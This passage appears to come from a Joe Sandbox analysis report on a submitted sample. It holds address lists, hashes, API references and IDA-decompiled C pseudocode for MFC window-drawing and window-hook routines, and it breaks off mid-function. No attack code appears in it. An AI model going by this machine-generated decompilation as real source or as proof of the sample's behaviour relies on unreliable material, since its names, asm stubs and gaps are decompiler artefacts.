0x00408511
0x00408517
0x0040851a
0x0040851c
0x00408520
0x00408523
0x00408526
0x00408526
0x00408528
0x0040852c
0x0040854f
0x00408553
0x0040855f
0x00408562
0x00408562
0x00408562
0x00408562
0x00408565
0x0040856c
0x0040856f
0x0040852e
0x0040852e
0x00408532
0x0040853d
0x00408540
0x00408540
0x00408540
0x00408542
0x00408546
0x0040854b
0x0040854b
0x00408576
0x00408576
0x00408576
0x00408578
0x0040857b
0x0040857d
0x0040857d
0x00408581
0x00408583
0x00000000
0x00408583
0x004082e5
0x00000000
0x004082f5
0x004082fb
0x004082ff
0x00408302
0x00408306
0x00408307
0x00408307
0x00408310
0x00408315
0x00408343
0x00408347
0x00408349
0x00408350
0x00408350
0x00408352
0x00408354
0x00408357
0x00408357
0x00408357
0x00408357
0x00408317
0x00408321
0x00408325
0x00408327
0x0040832b
0x0040832d
0x00408332
0x00408332
0x0040832d
0x00408315
0x00408360
0x00408369
0x00408371
0x00408378
0x00408428
0x0040837e
0x00408387
0x00408388
0x0040838f
0x00408393
0x00408393
0x00408397
0x0040839a
0x004083a0
0x004083a3
0x004083a6
0x004083a9
0x004083af
0x004083b8
0x004083ba
0x004083c1
0x004083c4
0x004083c6
0x004083ca
0x004083ed
0x004083f1
0x004083f3
0x004083fd
0x00408400
0x00408400
0x00408400
0x00408400
0x00408403
0x0040840a
0x0040840a
0x0040840d
0x004083cc
0x004083d0
0x004083de
0x004083de
0x004083e0
0x004083e4
0x004083e9
0x004083e9
0x00408414
0x00408414
0x00408416
0x00408419
0x0040841c
0x00408420
0x00408422
0x00408422
0x0040842b
0x0040842e
0x00408431
0x00000000
0x00408431

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: 00de992f94577e55d0855a628cf5fc13367e092eab98b966cb86fa3571df6218
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 32B1603590021ADFDB15CF04C6D0AA9BBA1FB54318F14C1AED8596B382DB35EA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02234E20, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02234E20() {

				return  *[fs:0x30];
			}

0x02234e26

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00423382, Relevance: 42.5, APIs: 28, Instructions: 479
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00423382(intOrPtr __ecx) {
				int _t231;
				void* _t239;
				int _t240;
				void* _t260;
				void* _t267;
				void* _t268;
				CHAR* _t280;
				signed int _t336;
				int _t392;
				CHAR* _t407;
				signed int _t408;
				signed int _t409;
				int _t420;
				struct tagSIZE* _t421;
				int _t428;
				signed int _t437;
				int _t442;
				signed int _t446;
				void* _t447;
				int _t453;
				void* _t456;
				intOrPtr _t461;

				E00406520(E0042A9E0, _t456);
				_t461 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
				if(_t461 == 0) {
					_push(__ecx);
					E0041A41D(_t456 - 0x44, __eflags);
					 *(_t456 - 4) = 0;
					 *(_t456 - 0x30) = E00416528(__ecx);
					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
					 *((intOrPtr*)(_t456 - 0x48)) = 0;
					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
					 *(_t456 - 4) = 1;
					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
					 *(_t456 - 4) = 2;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
					 *(_t456 - 0x58) = 0x42d72c;
					 *(_t456 - 4) = 3;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
					 *(_t456 - 0x10) = GetSystemMetrics(6);
					 *(_t456 - 0x14) = GetSystemMetrics(5);
					_t428 = GetSystemMetrics(0x21);
					_t231 = GetSystemMetrics(0x20);
					__eflags =  *(_t456 - 0x30) & 0x00040600;
					_t442 = _t231;
					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
						 *(_t456 - 0x74) = _t407;
						_t408 =  *(_t456 - 0x14);
						 *(_t456 - 0x18) = _t428 - _t407;
						_t336 = _t442 - _t408 + _t408;
						__eflags =  *(_t456 - 0x2f) & 0x00000002;
						 *(_t456 - 0x2c) = _t336;
						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
							_t409 =  *(_t456 - 0x18);
						} else {
							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
							_t437 =  *(_t456 - 0x18);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							_t336 =  *(_t456 - 0x2c);
							_t409 = _t437;
						}
						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
					}
					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						goto L25;
					} else {
						asm("movsd");
						asm("movsd");
						_t240 =  *0x439c9c; // 0x0
						asm("movsd");
						asm("movsd");
						_t446 =  *(_t456 - 0x10);
						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
						asm("sbb eax, eax");
						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						_t260 =  *0x439ca0; // 0x0
						__eflags = _t260;
						if(_t260 != 0) {
							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
							_t280 =  *0x436980; // 0x436994
							 *(_t456 - 0x10) = _t280;
							 *(_t456 - 4) = 4;
							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
							_t421 = _t456 - 0x78;
							asm("sbb esi, esi");
							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
								E0041A240(_t456 - 0x44, 6);
								asm("cdq");
								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
								__eflags = _t453;
							}
							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
							InflateRect(_t456 - 0x70, 0, 1);
							asm("cdq");
							asm("sbb eax, eax");
							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
							E00419DAA(_t456 - 0x44, 1);
							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
							__eflags =  *(_t456 - 0x18);
							if( *(_t456 - 0x18) != 0) {
								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
							}
							 *(_t456 - 4) = 3;
							E00416AEC(_t456 - 0x10);
						}
						__eflags =  *(_t456 - 0x2e) & 0x00000008;
						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
							L23:
							 *(_t456 - 0x24) =  *(_t456 - 0x64);
							L25:
							 *(_t456 - 0x58) = 0x42cb14;
							 *(_t456 - 4) = 9;
							E0041A668(_t456 - 0x58);
							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
							 *(_t456 - 4) = 0xa;
							E0041A668(_t456 - 0x60);
							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
							 *(_t456 - 4) = 0xb;
						} else {
							E00419B00(_t456 - 0x80);
							 *(_t456 - 4) = 5;
							asm("sbb eax, eax");
							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
							__eflags = _t267;
							if(_t267 != 0) {
								_t268 =  *0x439ca4; // 0x0
								__eflags = _t268;
								if(_t268 == 0) {
									_t447 = 0;
									__eflags = 0;
								} else {
									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
								}
								_t392 =  *0x439c9c; // 0x0
								_t420 =  *0x439c98; // 0x0
								asm("sbb eax, eax");
								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
								__eflags = _t447;
								if(_t447 != 0) {
									SelectObject( *(_t456 - 0x7c), _t447);
								}
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								goto L23;
							} else {
								 *(_t456 - 4) = 3;
								E00419C1F(_t456 - 0x80);
								 *(_t456 - 0x58) = 0x42cb14;
								 *(_t456 - 4) = 6;
								E0041A668(_t456 - 0x58);
								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
								 *(_t456 - 4) = 7;
								E0041A668(_t456 - 0x60);
								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
								 *(_t456 - 4) = 8;
							}
						}
					}
					E0041A668(_t456 - 0x4c);
					_t197 = _t456 - 4;
					 *_t197 =  *(_t456 - 4) | 0xffffffff;
					__eflags =  *_t197;
					_t239 = E0041A48F(_t456 - 0x44);
				} else {
					_t239 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
				return _t239;
			}

0x00423387
0x00423397
0x0042339f
0x004233a2
0x004233ae
0x004233b2
0x004233b9
0x004233c1
0x004233cb
0x004233e1
0x004233e7
0x004233ef
0x004233fa
0x0042340d
0x00423412
0x00423416
0x0042341c
0x00423428
0x00423437
0x0042343c
0x00423440
0x00423446
0x00423452
0x00423461
0x00423472
0x00423479
0x00423480
0x00423482
0x00423484
0x0042348b
0x0042348d
0x004234a5
0x004234ba
0x004234d8
0x004234e0
0x004234e5
0x004234ea
0x004234ed
0x004234f7
0x004234f9
0x004234fd
0x00423500
0x004235e8
0x00423506
0x0042350e
0x0042351e
0x0042352b
0x00423543
0x0042355f
0x0042357b
0x00423580
0x00423594
0x004235aa
0x004235c3
0x004235dc
0x004235e1
0x004235e4
0x004235e4
0x004235f5
0x004235f5
0x004235fb
0x004235ff
0x0042388a
0x00000000
0x00423605
0x0042360b
0x0042360c
0x0042360d
0x00423612
0x00423613
0x00423614
0x0042361c
0x0042362f
0x00423643
0x0042364e
0x0042365b
0x00423671
0x00423676
0x0042367b
0x0042367d
0x0042368d
0x00423690
0x00423695
0x0042369f
0x004236a3
0x004236b4
0x004236bd
0x004236ca
0x004236cd
0x004236d9
0x004236dc
0x004236e3
0x004236ed
0x004236f2
0x004236f2
0x004236f2
0x004236fe
0x00423721
0x00423730
0x00423742
0x00423750
0x0042375a
0x00423779
0x0042377f
0x00423783
0x0042378b
0x0042378b
0x00423794
0x00423798
0x00423798
0x0042379d
0x004237a1
0x00423870
0x00423873
0x0042388f
0x00423894
0x0042389a
0x0042389e
0x004238a3
0x004238a9
0x004238ad
0x004238b2
0x004238b5
0x004237a7
0x004237aa
0x004237b2
0x004237b8
0x004237c8
0x004237cd
0x004237cf
0x0042380c
0x00423811
0x00423813
0x00423823
0x00423823
0x00423815
0x0042381f
0x0042381f
0x00423825
0x0042382e
0x0042383b
0x00423850
0x00423856
0x00423858
0x0042385e
0x0042385e
0x00423867
0x0042386b
0x00000000
0x004237d1
0x004237d4
0x004237d8
0x004237e2
0x004237e8
0x004237ec
0x004237f1
0x004237f7
0x004237fb
0x00423800
0x00423803
0x00423803
0x004237cf
0x004237a1
0x004238bc
0x004238c1
0x004238c1
0x004238c1
0x004238c8
0x004233a4
0x004233a4
0x004233a4
0x004238d3
0x004238db

APIs

__EH_prolog.LIBCMT ref: 00423387
GetWindowRect.USER32 ref: 004233CB
OffsetRect.USER32(?,?,?), ref: 004233E1
GetSysColor.USER32(00000006), ref: 004233FE
CreateSolidBrush.GDI32(00000000), ref: 00423407
GetSysColor.USER32(?), ref: 0042342E
CreateSolidBrush.GDI32(00000000), ref: 00423431
GetSysColor.USER32(?), ref: 00423458
CreateSolidBrush.GDI32(00000000), ref: 0042345B
GetSystemMetrics.USER32 ref: 0042346E
GetSystemMetrics.USER32 ref: 00423475
GetSystemMetrics.USER32 ref: 0042347C
GetSystemMetrics.USER32 ref: 00423482
InflateRect.USER32(?,?,?), ref: 004234BA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139FC, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				CHAR* _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E00425C92(0x4397cc, E0042440D);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x439c54 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4);
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00413980;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E00413821;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00413785(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x439c3c != 0 || _v12 != 0) {
							L18:
							_t105 = E0041381B();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x439c50; // 0x6a2cb0
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E0041357F(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E0041381B();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					if(lstrcmpiA(_t76, ?str?) == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

0x004139fc
0x00413a0c
0x00413a15
0x00413a18
0x00000000
0x00413a26
0x00413a36
0x00413a3a
0x00413a41
0x00413a45
0x00413a48
0x00413a4d
0x00413a68
0x00413ab6
0x00413ab8
0x00413b6a
0x00413b72
0x00413b75
0x00413b7d
0x00413b88
0x00413b8f
0x00413b9c
0x00413b9f
0x00413bac
0x00413bb1
0x00413bb3
0x00413bb3
0x00413bbc
0x00413bbc
0x00413b9c
0x00413b88
0x00000000
0x00413b75
0x00413ac1
0x00413aca
0x00413ade
0x00413ae1
0x00413b44
0x00413b49
0x00413b4f
0x00413b57
0x00000000
0x00000000
0x00000000
0x00413ae9
0x00413ae9
0x00413af1
0x00000000
0x00413af9
0x00413af9
0x00413afb
0x00413afd
0x00413b02
0x00413b03
0x00413b04
0x00413b0b
0x00413b0e
0x00000000
0x00000000
0x00413b18
0x00413b1b
0x00413b2c
0x00413b2f
0x00413b34
0x00413b5e
0x00413b5e
0x00413b61
0x00000000
0x00413b61
0x00413b3c
0x00413b59
0x00413b5c
0x00000000
0x00413b5c
0x00413af1
0x00413ae1
0x00413a78
0x00000000
0x00000000
0x00413a7e
0x00413a83
0x00413a89
0x00413a8b
0x00413a99
0x00413a9f
0x00413a9f
0x00413ab0
0x00000000
0x00000000
0x00000000
0x00000000
0x00413bc2
0x00413bc2
0x00413bc2
0x00413bc5
0x00413bd8
0x00413bda
0x00413bdf
0x00413be5
0x00413be5
0x00000000
0x00413bed

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

CallNextHookEx.USER32 ref: 00413A26
GetClassLongA.USER32 ref: 00413A6D
GlobalGetAtomNameA.KERNEL32 ref: 00413A99
lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
GetWindowLongA.USER32 ref: 00413B1B
SetWindowLongA.USER32 ref: 00413B3C

Strings

AfxOldWndProc423, xrefs: 00413B7D, 00413B82, 00413B8D, 00413B95, 00413B9E
ime, xrefs: 00413AA2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00423C5A, Relevance: 28.8, APIs: 19, Instructions: 266
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00423C5A(intOrPtr* __ecx, void* __eflags) {
				void* _t146;
				void* _t150;
				void* _t159;
				void* _t165;
				intOrPtr* _t246;
				RECT* _t250;
				void* _t255;

				E00406520(E0042AAB8, _t255);
				_t246 = __ecx;
				E00405556(_t255 - 0x2c);
				 *(_t255 - 0x2c) = 0x42f0f0;
				 *((intOrPtr*)(_t255 - 4)) = 0;
				E00405556(_t255 - 0x1c);
				 *(_t255 - 0x1c) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 1;
				E00405556(_t255 - 0x14);
				 *(_t255 - 0x14) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 2;
				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
				CopyRect(_t255 - 0x44,  *(_t255 + 8));
				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
				_t261 =  *((intOrPtr*)(_t255 + 0x20));
				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
				}
				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
				}
				E00405556(_t255 - 0x24);
				 *(_t255 - 0x24) = 0x42f0f0;
				 *((char*)(_t255 - 4)) = 3;
				E00405556(_t255 - 0x34);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
				_t250 =  *(_t255 + 0x14);
				 *((char*)(_t255 - 4)) = 4;
				if(_t250 != 0) {
					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
					CopyRect(_t255 - 0x44, _t250);
					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
					asm("sbb eax, eax");
					asm("sbb ecx, ecx");
					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
						asm("sbb eax, eax");
						asm("sbb ecx, ecx");
						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
					E0041A0FB(_t246, _t255 - 0x24);
					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
					E00419D35(_t246, _t165);
				}
				_t146 = _t255 - 0x34;
				if( *(_t255 - 0x30) == 0) {
					_t146 = _t255 - 0x2c;
				}
				E0041A0FB(_t246, _t146);
				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
